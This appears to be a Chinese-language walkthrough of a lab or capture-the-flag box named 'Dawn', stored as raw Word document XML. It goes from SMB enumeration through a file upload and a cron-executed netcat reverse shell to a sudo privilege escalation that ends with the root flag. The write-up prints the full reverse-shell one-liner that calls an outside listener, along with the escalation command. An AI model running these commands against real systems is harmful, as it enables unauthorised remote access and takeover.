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197475" cy="2407920"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="11" name="圖片 11" descr="Daw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Dawn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0500" cy="2332990"/>
            <wp:effectExtent l="0" t="0" r="2540" b="13970"/>
            <wp:docPr id="10" name="圖片 10" descr="Daw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Dawn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1770" cy="1310640"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="9" name="圖片 9" descr="Daw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Dawn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有開80,139,445,3306 port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網頁沒內容，先看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>smb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6690" cy="1463675"/>
            <wp:effectExtent l="0" t="0" r="6350" b="14605"/>
            <wp:docPr id="12" name="圖片 12" descr="Daw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Dawn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t>smbclient -L 192.168.157.11</w:t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有三個share，查看ITDEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="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3040" cy="2486660"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="8" name="圖片 8" descr="Daw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Dawn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smbclient -N //192.168.157.11/ITDEPT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沒有任何檔案，其他share也是，試試put command可以作用，能上傳代表可能有放reverse shell的機會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006975" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="6985" b="7620"/>
            <wp:docPr id="7" name="圖片 7" descr="Daw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Dawn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慣例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>dirsearch，發現/logs/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73040" cy="3398520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="圖片 6" descr="Daw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Dawn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可以下載management.log查看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865" cy="2070735"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1905"/>
            <wp:docPr id="5" name="圖片 5" descr="Daw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Dawn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內容是一些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>command log，有趣的是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/bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 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/bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control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會不斷重複，且會不斷執行，並且是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>ITDEPT dir下，跟剛才看到的share name一樣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猜測是要上傳名為web-control的reverse shell file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"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865" cy="518160"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="4" name="圖片 4" descr="Daw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Dawn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rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 192.168.45.242 4444 &gt;/tmp/f</w:t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val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>用一般bash -i無法作用，改用上述command成功取得shell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4130675" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="3" name="圖片 3" descr="Daw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Dawn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cd /temp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上傳linpeas，掃出sudo vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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6690" cy="1729105"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
            <wp:docPr id="2" name="圖片 2" descr="Daw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Dawn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color w:val="auto"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>https://gtfobins.github.io/gtfobins/sudo/#sudo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>gtfobins有漏洞描述</w:t>
      </w:r>
    </w:p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3032760" cy="1310640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="圖片 1" descr="Daw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Dawn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sudo sudo /bin/sh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成功取得root flag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D4CE6"/>
    <w:rsid w:val="06736F90"/>
    <w:rsid w:val="104B4CC3"/>
    <w:rsid w:val="2DB22295"/>
    <w:rsid w:val="3C2C6FE7"/>
    <w:rsid w:val="3E7838CF"/>
    <w:rsid w:val="3EE712A6"/>
    <w:rsid w:val="514600E5"/>
    <w:rsid w:val="6B224EB5"/>
    <w:rsid w:val="78034632"/>
    <w:rsid w:val="7A86630B"/>
    <w:rsid w:val="7C89503A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2024-06-13T04:14:37Z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